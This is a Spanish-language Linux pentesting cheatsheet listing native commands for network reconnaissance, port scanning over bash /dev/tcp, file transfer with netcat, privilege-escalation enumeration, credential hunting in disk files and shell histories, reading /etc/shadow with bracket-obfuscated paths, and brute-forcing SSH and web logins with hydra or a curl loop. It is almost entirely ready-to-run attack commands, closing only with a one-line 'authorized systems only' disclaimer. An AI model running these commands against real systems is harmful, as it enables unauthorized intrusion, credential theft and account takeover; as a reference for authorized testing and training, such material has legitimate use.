Comandos Esenciales de Linux

Linux Pentesting Cheatsheet

Comandos nativos del sistema, sin instalar herramientas externas. Ideal para entornos donde no podés llevar tu toolset. Todos estos comandos vienen preinstalados en cualquier distribución Linux estándar.

ReconocimientoTransferenciaEscaladaPost-explotaciónReverse ShellsFuerza Bruta

Host Discovery

ARP scan (red local)
arp-scan -l
Ping sweep (sin nmap)
for i in {1..254}; do
  ping -c1 -W1 192.168.1.$i >/dev/null &&
  echo "Host: 192.168.1.$i UP";
done
Port scan (bash nativo)
for p in {1..1024}; do
  (echo >/dev/tcp/10.0.0.1/$p) 2>/dev/null &&
  echo "Puerto $p abierto";
done

DNS, WHOIS y SSL

Consultas DNS
host -t any dominio.com
dig dominio.com ANY +short
nslookup dominio.com
WHOIS
whois dominio.com
Certificados SSL
openssl s_client -connect host:443 \
  -servername host </dev/null 2>/dev/null |
openssl x509 -text

File Transfer

Servidor HTTP (Python)
python3 -m http.server 8080
Descarga con bash puro
exec 3<>/dev/tcp/192.168.1.10/8080;
echo -e "GET /file.txt HTTP/1.1\r\n..." >&3;
cat <&3
Netcat (si disponible)
# Receptor
nc -lvnp 4444 < archivo
# Emisor
nc 192.168.1.10 4444 > archivo

Escalada – Info del sistema

Identificación
id; whoami; uname -a
SUID / SGID
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
Capabilities
getcap -r / 2>/dev/null
Archivos escribibles globalmente
find / -writable -type f 2>/dev/null |
grep -v proc | grep -v sys

Escalada – Credenciales

Buscar passwords en disco
grep -r "password" /etc/ 2>/dev/null
grep -r "PASS" /home/ 2>/dev/null
Archivos recientes de root
find / -user root -mmin -60 2>/dev/null
Cron jobs
ls -la /etc/cron*
cat /etc/crontab
crontab -l
Procesos como root
ps aux | grep root

Escalada – Red y GTFOBins

Conexiones activas
ss -tlnp
netstat -tulpn 2>/dev/null
Historial de comandos
history
cat ~/.bash_history
cat ~/.zsh_history
Enumerar SUIDs
for b in $(find / -perm -4000 -type f 2>/dev/null);
do basename $b; done

Post-Explotación

Passwd / Shadow
cat /etc/pass[w]d
cat /etc/sha[d]ow 2>/dev/null ||
echo "Sin permisos"
Usuarios del sistema
cut -d: -f1 /etc/pass[w]d
getent passwd
Kernel / OS
uname -a; cat /etc/os-release
lsb_release -a 2>/dev/null
Monturas
mount; df -h; lsblk
cat /etc/fstab
Buscar IPs en /home
grep -roE "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" /home/ 2>/dev/null

Fuerza Bruta

Hydra SSH
hydra -l root -P passwords.txt ssh://10.0.0.1
Hydra HTTP POST
hydra -l admin -P passwords.txt 10.0.0.1 \
  http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
Sin hydra (bash + curl)
for p in $(cat passwords.txt); do
  curl -s -d "user=admin&pass=$p" \
  http://10.0.0.1/login.php |
  grep -q "incorrect" ||
  echo "Password: $p";
done

Binarios nativos útiles

strings   # Extraer texto de binarios
base64    # Codificar/decodificar
xxd       # Hexdump
od        # Octal dump
dd        # Copia a bajo nivel
tcpdump   # Sniffer de paquetes
script    # Grabar sesion
screen    # Multiplexor terminal
strace    # Traza syscalls
objdump   # Desensamblador
readelf   # Info ELF
socat     # Forwarding
mkfifo    # Named pipes
Solo para sistemas autorizados – Uso responsable